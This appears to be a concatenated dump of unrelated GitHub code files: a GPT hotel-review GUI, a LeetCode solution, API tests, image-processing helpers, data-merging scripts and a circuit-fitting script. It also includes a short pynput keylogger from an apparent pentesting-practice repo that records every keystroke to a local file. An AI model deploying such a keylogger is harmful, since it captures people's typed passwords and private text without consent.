weight=1)\n self.tk_scoring_frame.grid_columnconfigure(4, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(5, weight=1)\n self.tk_scoring_frame.grid_columnconfigure(6, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(7, weight=1)\n self.tk_scoring_frame.grid_columnconfigure(8, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(9, weight=1)\n self.tk_scoring_frame.grid_rowconfigure(0, weight=0)\n self.tk_scoring_frame.grid_rowconfigure(1, weight=0)\n\n # Review Frame\n self.tk_review_frame = ctk.CTkFrame(self, corner_radius=0)\n self.tk_review_frame.grid(row=1, column=0, sticky=\"nsew\")\n\n self.tk_review_frame.grid_columnconfigure(0, weight=1)\n self.tk_review_frame.grid_columnconfigure(1, weight=8)\n self.tk_review_frame.grid_rowconfigure(0, weight=0)\n self.tk_review_frame.grid_rowconfigure(1, weight=1)\n self.tk_review_frame.grid_rowconfigure(2, weight=0)\n self.tk_review_frame.grid_rowconfigure(3, weight=1)\n self.tk_review_frame.grid_rowconfigure(4, weight=0)\n self.tk_review_frame.grid_rowconfigure(5, weight=1)\n self.tk_review_frame.grid_rowconfigure(6, weight=0)\n self.tk_review_frame.grid_rowconfigure(7, weight=1)\n self.tk_review_frame.grid_rowconfigure(8, weight=0)\n self.tk_review_frame.grid_rowconfigure(9, weight=1)\n\n # Submit Frame\n self.tk_submit_frame = ctk.CTkFrame(self, corner_radius=0)\n self.tk_submit_frame.grid(row=2, column=0, sticky=\"nsew\")\n\n 
self.tk_submit_frame.grid_columnconfigure(0, weight=1)\n self.tk_submit_frame.grid_columnconfigure(1, weight=8)\n self.tk_submit_frame.grid_rowconfigure(0, weight=1)\n\n def create_widgets(self):\n # Scoring Frame\n self.tk_score_hygiene_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Hygiene Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_hygiene_label.grid(row=0, column=0, sticky=\"nsew\", columnspan=2)\n self.tk_score_food_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Food Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_food_label.grid(row=0, column=2, sticky=\"nsew\", columnspan=2)\n self.tk_score_reception_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Reception Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_reception_label.grid(row=0, column=4, sticky=\"nsew\", columnspan=2)\n self.tk_score_bar_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Bar Score\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_bar_label.grid(row=0, column=6, sticky=\"nsew\", columnspan=2)\n self.tk_score_other_label = ctk.CTkLabel(self.tk_scoring_frame, text=\"Other Comments\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_score_other_label.grid(row=0, column=8, sticky=\"nsew\", columnspan=2)\n\n self.tk_score_hygiene_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/safe.png\"), dark_image=Image.open(\"gui_assets/safe.png\"), size=(60,60))\n self.tk_score_hygiene_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_hygiene_image, text=\"\")\n self.tk_score_hygiene_image_label.grid(row=1, column=0, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_hygiene_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_hygiene_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_hygiene_count_var)\n self.tk_score_hygiene_count_label.grid(row=1, column=1, sticky=\"nsew\")\n\n self.tk_score_food_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/restaurant.png\"), dark_image=Image.open(\"gui_assets/restaurant.png\"), size=(60,60))\n self.tk_score_food_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_food_image, text=\"\")\n self.tk_score_food_image_label.grid(row=1, column=2, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_food_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_food_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_food_count_var)\n self.tk_score_food_count_label.grid(row=1, column=3, sticky=\"nsew\")\n\n self.tk_score_reception_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/reception.png\"), dark_image=Image.open(\"gui_assets/reception.png\"), size=(60,60))\n self.tk_score_reception_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_reception_image, text=\"\")\n self.tk_score_reception_image_label.grid(row=1, column=4, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_reception_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_reception_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_reception_count_var)\n self.tk_score_reception_count_label.grid(row=1, column=5, sticky=\"nsew\")\n\n self.tk_score_bar_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/martini.png\"), dark_image=Image.open(\"gui_assets/martini.png\"), size=(60,60))\n self.tk_score_bar_image_label = ctk.CTkLabel(self.tk_scoring_frame, 
image=self.tk_score_bar_image, text=\"\")\n self.tk_score_bar_image_label.grid(row=1, column=6, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_bar_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_bar_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_bar_count_var)\n self.tk_score_bar_count_label.grid(row=1, column=7, sticky=\"nsew\")\n\n self.tk_score_other_image = ctk.CTkImage(light_image=Image.open(\"gui_assets/more-information.png\"), dark_image=Image.open(\"gui_assets/more-information.png\"), size=(60,60))\n self.tk_score_other_image_label = ctk.CTkLabel(self.tk_scoring_frame, image=self.tk_score_other_image, text=\"\")\n self.tk_score_other_image_label.grid(row=1, column=8, sticky=\"nsew\", padx=7, pady=7)\n\n self.tk_score_other_count_var = tk.IntVar(self.tk_scoring_frame, value=0)\n self.tk_score_other_count_label = ctk.CTkLabel(self.tk_scoring_frame, textvariable=self.tk_score_other_count_var)\n self.tk_score_other_count_label.grid(row=1, column=9, sticky=\"nsew\")\n\n self.tk_scoring_frame_separator = ttk.Separator(self.tk_scoring_frame, orient=\"horizontal\")\n self.tk_scoring_frame_separator.grid(row=2, column=0, sticky=\"nsew\", columnspan=10)\n\n # Review Frame\n self.tk_hygiene_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Hygiene Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_hygiene_review_label.grid(row=0, column=0, sticky=\"nsew\")\n self.tk_hygiene_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe the hygiene, maintenance and cleanliness of the hotel.\")\n self.tk_hygiene_review_clarification_label.grid(row=0, column=1, sticky=\"nsew\")\n\n self.tk_hygiene_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_hygiene_review_text.grid(row=1, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_food_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Food Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_food_review_label.grid(row=2, column=0, sticky=\"nsew\")\n self.tk_food_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe the food and restaurant experience.\")\n self.tk_food_review_clarification_label.grid(row=2, column=1, sticky=\"nsew\")\n\n self.tk_food_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_food_review_text.grid(row=3, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_reception_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Reception Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_reception_review_label.grid(row=4, column=0, sticky=\"nsew\")\n self.tk_reception_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe your experience with the reception and service staff.\")\n self.tk_reception_review_clarification_label.grid(row=4, column=1, sticky=\"nsew\")\n\n self.tk_reception_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_reception_review_text.grid(row=5, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_bar_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Bar Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_bar_review_label.grid(row=6, column=0, sticky=\"nsew\")\n self.tk_bar_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Describe your experience at the bar and other entertainment facilities.\")\n self.tk_bar_review_clarification_label.grid(row=6, column=1, sticky=\"nsew\")\n\n 
self.tk_bar_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_bar_review_text.grid(row=7, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_other_review_label = ctk.CTkLabel(self.tk_review_frame, text=\"Other Review\", bg_color=header_label_color, text_color=header_font_color)\n self.tk_other_review_label.grid(row=8, column=0, sticky=\"nsew\")\n self.tk_other_review_clarification_label = ctk.CTkLabel(self.tk_review_frame, text=\"Include any other comments that do not fit in the above categories.\")\n self.tk_other_review_clarification_label.grid(row=8, column=1, sticky=\"nsew\")\n\n self.tk_other_review_text = tk.Text(self.tk_review_frame, height=5)\n self.tk_other_review_text.grid(row=9, column=0, sticky=\"nsew\", columnspan=2)\n\n self.tk_review_frame_separator = ttk.Separator(self.tk_review_frame, orient=\"horizontal\")\n self.tk_review_frame_separator.grid(row=10, column=0, sticky=\"nsew\", columnspan=2)\n\n # Submit Frame\n self.tk_submit_button = ctk.CTkButton(self.tk_submit_frame, text=\"Submit\", command=self.submit)\n self.tk_submit_button.grid(row=0, column=0, sticky=\"nsew\", padx=3, pady=3)\n\n self.tk_gpt_comment_text = tk.Text(self.tk_submit_frame, height=3)\n self.tk_gpt_comment_text.grid(row=0, column=1, sticky=\"nsew\")\n\n self.set_feedback_text(\"You will receive feedback on your review here.\")\n\n def set_feedback_text(self, text):\n self.tk_gpt_comment_text.configure(state=\"normal\")\n self.tk_gpt_comment_text.delete(1.0, tk.END)\n self.tk_gpt_comment_text.insert(tk.END, text)\n self.tk_gpt_comment_text.see(tk.END)\n self.tk_gpt_comment_text.configure(state=\"disabled\")\n\n def submit(self):\n review = Review(\n hygiene_review=self.tk_hygiene_review_text.get(\"1.0\", \"end-1c\"),\n food_review=self.tk_food_review_text.get(\"1.0\", \"end-1c\"),\n reception_review=self.tk_reception_review_text.get(\"1.0\", \"end-1c\"),\n bar_review=self.tk_bar_review_text.get(\"1.0\", \"end-1c\"),\n other_comments=self.tk_other_review_text.get(\"1.0\", \"end-1c\")\n )\n\n results = self.analyzer.validate(review)\n\n if results.is_valid:\n new_scoring = self.analyzer.score(review)\n self.change_score(new_scoring)\n\n self.set_feedback_text(\"Thank you for your review!\")\n\n else:\n self.set_feedback_text(results.explanation)\n\n def change_score(self, scores):\n def score_reward(score):\n if score == 1: return -50\n elif score == 2: return -25\n elif score == 3: return 0\n elif score == 4: return 50\n elif score == 5: return 100\n else: return 0\n\n self.hygiene_score += score_reward(scores.hygiene_score)\n self.food_score += score_reward(scores.food_score)\n self.reception_score += score_reward(scores.reception_score)\n self.bar_score += score_reward(scores.bar_score)\n self.other_comments_score += score_reward(scores.other_comments_score)\n\n self.tk_score_hygiene_count_var.set(self.hygiene_score)\n self.tk_score_food_count_var.set(self.food_score)\n self.tk_score_reception_count_var.set(self.reception_score)\n self.tk_score_bar_count_var.set(self.bar_score)\n self.tk_score_other_count_var.set(self.other_comments_score)\n\n\n\nif __name__ == \"__main__\":\n app = Reviewer()\n app.mainloop()\n","repo_name":"Darustc4/gpt-hotel-reviews","sub_path":"gpt_reviewer_gui.py","file_name":"gpt_reviewer_gui.py","file_ext":"py","file_size_in_byte":14040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"38283373627","text":"class Solution(object):\n def minimumTotal(self, triangle):\n \"\"\"\n :type triangle: 
List[List[int]]\n :rtype: int\n \"\"\"\n w = len(triangle[-1])\n h = len(triangle)\n T = [[None for i in range(w)] for j in range(h)]\n for i in range(h):\n for j in range(i+1):\n if i - 1 < 0:\n T[i][j] = triangle[i][j]\n else:\n if T[i-1][j] == None:\n T[i][j] = triangle[i][j] + T[i-1][j-1]\n elif T[i-1][j-1] == None:\n T[i][j] = triangle[i][j] + T[i-1][j]\n else:\n if T[i-1][j-1] < T[i-1][j]:\n T[i][j] = triangle[i][j] + T[i-1][j-1]\n else:\n T[i][j] = triangle[i][j] + T[i-1][j]\n print(T)\n totalMin = T[-1][0]\n for i in range(len(T[-1])):\n if T[-1][i] < totalMin:\n totalMin = T[-1][i]\n return totalMin\n \n\ns = Solution()\n#r = s.minimumTotal([[2],[3,4],[6,5,7],[4,1,8,3]])\nr = s.minimumTotal([[-8],[3,-6],[5,7,1],[-9,5,0,-4],[-2,4,-1,1,8]])\nprint(r)\n","repo_name":"chengang/leetcode","sub_path":"python/120-Triangle.py","file_name":"120-Triangle.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15779589522","text":"#!/usr/bin/python3\n\nimport pynput\n\ncount =0\nKeys=[]\n\nfrom pynput.keyboard import Key, Listener\n\ndef write_file(Keys):\n with open(\"logs.txt\",\"a\") as f:\n for key in Keys:\n k=str(key).replace(\"'\",\" \")\n\n #Key.space\n if k.find(\"space\") > 0:\n f.write('\\n')\n\n #Key.backspace\n elif k.find(\"Key\") == -1:\n f.write(k)\n\ndef when_pressed(key):\n #print(key, \"was pressed\")\n global count, Keys\n Keys.append(key)\n count = count+1\n if count>=10:\n write_file(Keys)\n Keys=[]\n count=0\n print(\"{0} pressed\".format(key))\n\n\n\n\ndef when_released(key):\n #print(key, \"was released\")\n #print(\"{0} released\".format(key))\n if key == Key.esc:\n return FALSE\n\nwith Listener(on_press=when_pressed, on_release=when_released) as listener: #just replaced it with lower case listener\n listener.join()","repo_name":"Zshader/Python-for-pentesting","sub_path":"Keylogger.py","file_name":"Keylogger.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30200529026","text":"import pytest\nimport requests\nimport json\n\nfrom src.config import url\n\n@pytest.fixture\ndef users():\n requests.delete(url + \"clear/v1\")\n\n global_owner = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"eru.iluvatar@gmail.com\", \"password\": \"123abc!@\", \"name_first\": \"Eru\", \"name_last\": \"Iluvatar\" \n })\n global_owner = global_owner.json()\n\n u1 = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"validemail@gmail.com\", \"password\": \"123abc!@\", \"name_first\": \"Hayden\", \"name_last\": \"Everest\" \n })\n u1 = u1.json()\n\n u2 = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"ANOTHERVALIDEMAIL@gmail.com\", \"password\": \"Hello456abc!@\", \"name_first\": \"Thomas\", \"name_last\": \"Bobson\" \n })\n u2 = u2.json()\n\n u3 = requests.post(url + \"/auth/register/v2\", json={\n \"email\": \"harry.potter@gmail.com\", \"password\": \"Harry456abc!@\", \"name_first\": \"Harry\", \"name_last\": \"Potter\" \n })\n u3 = u3.json()\n\n return [u1, u2, u3, global_owner]\n\n@pytest.fixture\ndef channels(users):\n\n dm_1 = requests.post(url + \"dm/create/v1\", json={\n \"token\": users[0][\"token\"], \"u_ids\": [users[1][\"auth_user_id\"]]}).json()\n \n channel_1 = requests.post(url + \"channels/create/v2\", json={\n \"token\": users[0]['token'], \"name\": \"test\", \"is_public\": True\n }).json()\n\n return [dm_1, channel_1]\n\ndef 
test_user_profile(users):\n profile = requests.get(url + \"user/profile/v2\", params={\"token\": users[0][\"token\"], \"u_id\": users[3][\"auth_user_id\"]}).json()[\"user\"]\n\n assert profile[\"name_first\"] == \"Eru\"\n assert profile[\"name_last\"] == \"Iluvatar\"\n assert profile[\"email\"] == \"eru.iluvatar@gmail.com\"\n assert profile[\"handle_str\"] == \"eruiluvatar\"\n assert profile[\"u_id\"] == users[3][\"auth_user_id\"]\n\ndef test_user_profile_no_exist(users):\n\n assert requests.get(url + \"user/profile/v2\", params={\"token\": users[0][\"token\"], \"u_id\": 42}).status_code == 400\n\n\ndef test_set_name_email_handle(users, channels):\n\n name_first = \"Lelouch\"\n name_last = \"Lamperouge\"\n email = \"lelouch.lamperouge@Britannia.com\"\n handle = \"Zero\"\n\n requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": name_first, \"name_last\": name_last})\n\n requests.put(url + \"user/profile/setemail/v2\", json={\n \"token\": users[0][\"token\"], \"email\": email})\n\n requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": handle})\n \n profile = requests.get(url + \"user/profile/v2\", params={\"token\": users[0][\"token\"], \"u_id\": users[0][\"auth_user_id\"]}).json()[\"user\"]\n\n assert profile[\"name_first\"] == name_first\n assert profile[\"name_last\"] == name_last\n assert profile[\"email\"] == email\n assert profile[\"handle_str\"] == handle\n\n channel_details = requests.get(url + \"channel/details/v2\", params={\n \"token\": users[0]['token'], \"channel_id\": channels[1][\"channel_id\"]\n }).json()\n\n assert channel_details[\"owner_members\"][0][\"email\"] == email\n assert channel_details[\"owner_members\"][0][\"handle_str\"] == handle\n assert channel_details[\"owner_members\"][0][\"name_first\"] == name_first\n assert channel_details[\"owner_members\"][0][\"name_last\"] == name_last\n\n assert channel_details[\"all_members\"][0][\"email\"] == email\n assert channel_details[\"all_members\"][0][\"handle_str\"] == handle\n assert channel_details[\"all_members\"][0][\"name_first\"] == name_first\n assert channel_details[\"all_members\"][0][\"name_last\"] == name_last\n\n\n dm_details = requests.get(url + \"dm/details/v1\", params={\n \"token\": users[0]['token'], \"dm_id\": channels[0][\"dm_id\"]\n }).json()\n\n assert dm_details[\"members\"][0][\"email\"] == email\n assert dm_details[\"members\"][0][\"handle_str\"] == handle\n assert dm_details[\"members\"][0][\"name_first\"] == name_first\n assert dm_details[\"members\"][0][\"name_last\"] == name_last\n\n\ndef test_set_handle_already_in_use(users):\n handle = \"harrypotter\"\n\n assert requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": handle}).status_code == 400\n\ndef test_set_handle_and_name_too_long_or_short(users):\n long_string = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n name_first = \"Lelouch\"\n name_last = \"Lamperouge\"\n\n assert requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": long_string}).status_code == 400\n\n assert requests.put(url + \"user/profile/sethandle/v1\", json={\n \"token\": users[0][\"token\"], \"handle_str\": \"hi\"}).status_code == 400\n\n assert requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": long_string, \"name_last\": name_last}).status_code == 400\n assert requests.put(url + 
\"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": name_first, \"name_last\": long_string}).status_code == 400\n\n assert requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": \"\", \"name_last\": name_last}).status_code == 400\n\n assert requests.put(url + \"user/profile/setname/v2\", json={\n \"token\": users[0][\"token\"], \"name_first\": name_first, \"name_last\": \"\"}).status_code == 400\n\ndef test_set_email_exceptions(users):\n invalid_email = \"wrong$$$Email@gmail.com\"\n used_email = \"eru.iluvatar@gmail.com\"\n\n assert requests.put(url + \"user/profile/setemail/v2\", json={\n \"token\": users[0][\"token\"], \"email\": used_email}).status_code == 400\n\n assert requests.put(url + \"user/profile/setemail/v2\", json={\n \"token\": users[0][\"token\"], \"email\": invalid_email}).status_code == 400\n\n requests.delete(url + \"clear/v1\")\n","repo_name":"Lionel307/Software-engineering-fundamentals","sub_path":"project/http_tests/user_profiles_http_test.py","file_name":"user_profiles_http_test.py","file_ext":"py","file_size_in_byte":5744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70147522386","text":"## Auxiliary routines for image processing algorithms\nimport numpy as np; from numpy.linalg import inv\nimport matplotlib.pyplot as plt; from matplotlib.colors import LinearSegmentedColormap as lscm\n\n#Image presentation\ndef displayImages(images, titles = '', cmp = 'gray', show = True):\n# if type(images) is tuple or type(images) is list: \n if isinstance(images, (tuple, list)): \n number = len(images)\n fig = plt.figure(figsize = (number * 3, 3)); fig.tight_layout()\n for p, (image, title) in enumerate(zip(images, titles)):\n sb = plt.subplot(1, number, p + 1)\n sb.set_xticks([]); sb.set_yticks([])\n plt.title(title); plt.imshow(image, cmap = cmp)\n else:\n sb = plt.subplot(1, 1, 1)\n sb.set_xticks([]); sb.set_yticks([])\n plt.title(titles); plt.imshow(images, cmap = cmp)\n if show: plt.show()\n\ndef displayPlots(plots, titles):\n for p, (pl, ttl) in enumerate(zip(plots, titles)):\n plt.subplot(1, len(plots), p + 1)\n plt.title(ttl); plt.plot(pl)\n plt.show()\n\ndef displayPlotsXY(plots, titles):\n for p, ((x, y), ttl) in enumerate(zip(plots, titles)):\n plt.subplot(1, len(plots), p + 1)\n plt.title(ttl); plt.plot(x, y)\n plt.show()\n\n# Image dissection presentation (the channels and the resulting image)\ndef displayChannels(images, channels, rows = 1, cols = 4, title = 'RGB'):\n for image in images:\n for p, c in enumerate(channels):\n sb = plt.subplot(rows, cols, p + 1)\n sb.set_xticks([]); sb.set_yticks([])\n cmp = lscm.from_list('_', ['black', c])\n plt.title(c); plt.imshow(image[..., p], cmp)\n sb = plt.subplot(rows, cols, rows * cols)\n sb.set_xticks([]); sb.set_yticks([])\n plt.title(title); plt.imshow(image)\n plt.show()\n\n# When you don't care about the return value\ndef splot(*args, scalex = True, scaley = True, data = None, **kwargs): \n _ = plt.plot(*args, scalex = True, scaley = True, data = None, **kwargs)\n\n# CFA filter mask (replication of a single CFA segment into a whole sensor mask)\ndef CFA(masks, X):\n return np.dstack([np.tile(mask, X) for mask in masks])\n\nJPG_QT_Y = [[16, 11, 10, 16, 24, 40, 51, 61],\n [12, 12, 14, 19, 26, 58, 60, 55],\n [14, 13, 16, 24, 40, 57, 69, 56],\n [14, 17, 22, 29, 51, 87, 80, 62],\n [18, 22, 37, 56, 68, 109, 103, 77],\n [24, 35, 55, 64, 81, 104, 113, 92],\n [49, 64, 78, 87, 103, 
121, 120, 101],\n [72, 92, 95, 98, 112, 100, 103, 99]]\n\nJPG_QT_CbCr = [[17, 18, 24, 47, 99, 99, 99, 99], \n [18, 21, 26, 66, 99, 99, 99, 99], \n [24, 26, 56, 99, 99, 99, 99, 99], \n [47, 66, 99, 99, 99, 99, 99, 99], \n [99, 99, 99, 99, 99, 99, 99, 99],\n [99, 99, 99, 99, 99, 99, 99, 99], \n [99, 99, 99, 99, 99, 99, 99, 99], \n [99, 99, 99, 99, 99, 99, 99, 99]]\n\n## Irréversible Color Transform (ICT)\nRGB2YCbCr = [[ .299, .587, .114],\n [-.168736, -.331264, .5],\n [ .5, -.418688, -.081312]]\nYCbCr2RGB = inv(np.array(RGB2YCbCr))\n\n## Reversible Color Transform (RCT)\ndef RCT(R, G, B): \n Y, Cb, Cr = int(np.floor((R + 2*G + B)/4)), B - G, R - G\n return (Y, Cb, Cr)\n\ndef invRCT(Y, Cb, Cr): \n G = Y - int(np.floor((Cb + Cr)/4))\n R, B = Cr + G, Cb + G\n return (R, G, B)\n\n\n## A decorative fun... See: https://www.geeksforgeeks.org/decorators-in-python/\nfrom time import time as TT\ndef ITT(f):\n\tdef time_warper_wrapper(*args, **kwargs): \n\t\tbegin = TT() # from time import time as TT\n\t\tr = f(*args, **kwargs) \n\t\tend = TT()\n\t\tprint(f'{f.__name__} evaluated in {round(end - begin)}s')\n\t\treturn r\n\treturn time_warper_wrapper\n\n\n","repo_name":"Bahrd/AppliedPythonology","sub_path":"auxiliary.py","file_name":"auxiliary.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"14798113495","text":"from random import randint\n\nfrom field_space import FieldSpace\nfrom name_source import next_name\n\ndef random_field_space(task_name, settings):\n name = next_name('field_space')\n num_fields = randint(1, settings.max_fields)\n field_ids = []\n for i in xrange(num_fields):\n field_ids.append(name + '_' + str(i))\n return FieldSpace(name, task_name, field_ids)\n","repo_name":"dillonhuff/test_gen","sub_path":"generator/rand_field_space.py","file_name":"rand_field_space.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40915630232","text":"import os\nimport pandas as pd\n\n\n\nimport pandas as pd\nimport os\nimport warnings\n\nwarnings.filterwarnings(\"ignore\")\n\n\ncols = ['0|Objecten:Verblijfsobject|Objecten:identificatie','x','y']\ndf_list = []\nfinal_df = pd.DataFrame()\ndf_append = pd.DataFrame()\n# for filename in os.listdir():\n# if filename.endswith(\".csv\"):\n# df = pd.read_csv(filename)\n# df = df.drop_duplicates(subset='0|Objecten:Verblijfsobject|Objecten:identificatie', keep='last')\n# df = df[cols]\n# df_list.append(df)\npath = os.path.dirname(os.path.realpath(__file__))\nfor i in range(1,2170):\n file = \"verblijfsplaatsen{:01d}.csv\".format(i)\n print(f'Bezig met {file}')\n df_temp = pd.read_csv(f'{path}/{file}')\n df_temp = df_temp[cols]\n df_append = df_append.append(df_temp, ignore_index = True)\n print('Row count is:', len(df_append.axes[0]))\n\ndf_append = df_append.drop_duplicates(subset='0|Objecten:Verblijfsobject|Objecten:identificatie', keep='last')\nfile = \"verblijfplaatsen_longer.csv\"\ndf_append.to_csv(f\"{path}/{file}\")\nprint('Row count is:', len(df_append.axes[0]))\nprint(\"concatenating done!\")","repo_name":"S127-Pi/rainwater_damage","sub_path":"BAG/read_xml_scripts/data/csv/merge_csv.py","file_name":"merge_csv.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34930624880","text":"import glob, os\nimport numpy as np\n\nfiles = []\nwith 
open(\"stimuli_list.txt\", \"r\") as f:\n files = f.readlines()\n# print(files)\n\nos.chdir(\"/scratch/CSAI/image_feature/InceptionV3/train\")\n# path = \"/scratch/CSAI/image_feature/InceptionV3/train\"\npath = \".\"\n\n\n# print(os.getcwd())\n\nfor layer in [248, 279, 310, -1]:\n print(layer)\n patht = path + \"/\" + str(layer)\n values = {}\n # values[layer] = {}\n # print(patht)\n # print(os.listdir(patht))\n\n file_list = os.listdir(patht)\n # print(file_list)\n # print(os.getcwd())\n for line in files:\n if \"COCO\" in line:\n # print(line)\n if (str(line.split(\"\\n\")[0])+\".npy\") in file_list:\n # print(line, line+\".npy\")\n id = int(line.split(\"\\n\")[0].split(\"_\")[2].split(\".\")[0])\n # print(id)\n values[id] = np.load(str(layer)+\"/\"+line.split(\"\\n\")[0]+\".npy\", allow_pickle=True)\n print(len(values.keys()))\n # print(values[layer].keys())\n # for filename in os.listdir(patht):\n # if(filename.slit(\"_\")[0] == \"COCO\"):\n # if \".\".join(filename.split(\"/\")[-1].split(\".\")[:-1]) in files:\n # print(filename)\n # id = int(filename.split(\"_\")[2].split(\".\")[0])\n # values[layer][id] = np.load(filename, allow_pickle=True)\n# print(values.keys())\n np.save(\"./Required_\"+str(layer)+\".npy\", values)","repo_name":"kushagragarwal2443/Brain_decoding_caption_generator","sub_path":"other_codes/files_coco.py","file_name":"files_coco.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28531058385","text":"from Source import *\n\n# load data\ndf = pd.read_csv(\"data/Versuch7_4.csv\")\n# rename columns\ndf.columns = [\"t\", \"V\"]\nrate = get_polling_rate(df)\n\nstd = df[\"V\"].std()\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_5.csv\")\n# rename columns\ndf.columns = [\"t\", \"V1\", \"V2\"]\n\n# plot the data\nfig = plt.figure(figsize=(8, 3))\nplt.scatter(df[\"t\"], df[\"V1\"], label=\"A1\")\nplt.scatter(df[\"t\"], df[\"V2\"], label=\"A2\", s=1)\nplt.xlabel(\"Zeit [s]\")\nplt.ylabel(\"Spannung [V]\")\nplt.xlim(0, 5.2)\nlgnd = plt.legend(loc=\"upper right\")\nlgnd.legendHandles[0]._sizes = [30]\nlgnd.legendHandles[1]._sizes = [30]\nplt.tight_layout()\n# plt.savefig(\"Graphics/test.pdf\", transparent=True)\nplt.show()\n\n\n# %%\n# load data\ndf = pd.read_csv(\"data/Versuch7_1.csv\")\n# rename columns\ndf.columns = [\"t\", \"V\"]\ndf[\"Verr\"] = std\nrate = get_polling_rate(df)\n\nstart, end = 1060, 1260\n\n# pick 5 random numbers between start and end\n# points = np.random.randint(start, end, 10)\npoints = np.array([1060, 1070, 1080, 1090, 1100, 1110, 1140, 1180, 1220, 1300])\n# print(df[\"V\"][points])\n\ndef exp(x, b):\n return 3.*np.exp(-x/b) + 0.00073\n\n# fit exponential to data\npopt, pcov = curve_fit(exp, df[\"t\"][points] - df[\"t\"][start], df[\"V\"][points], p0=[0.02])\nperr = np.sqrt(np.diag(pcov))\n\nR = unc.ufloat(10000, 100, \"R\")\nC = 2.2e-6\ntau = R*C\n\nexptau = unc.ufloat(popt[0], perr[0])\nprint(f\"tau = {tau:.1uS} s: exptau = {exptau:.1uS} s\")\n\n# %%\n# plot data\nfig = plt.figure(figsize=(8, 3))\nplt.scatter(df.t, df.V, s=5, c=\"k\", label=\"Messwerte\")\nplt.plot(df.t, exp(df.t-df[\"t\"][start], *popt), \"r-\", label=\"Fit\")\nplt.scatter(df.t[points], df[\"V\"][points], color=\"red\", label=\"Ausgewählte 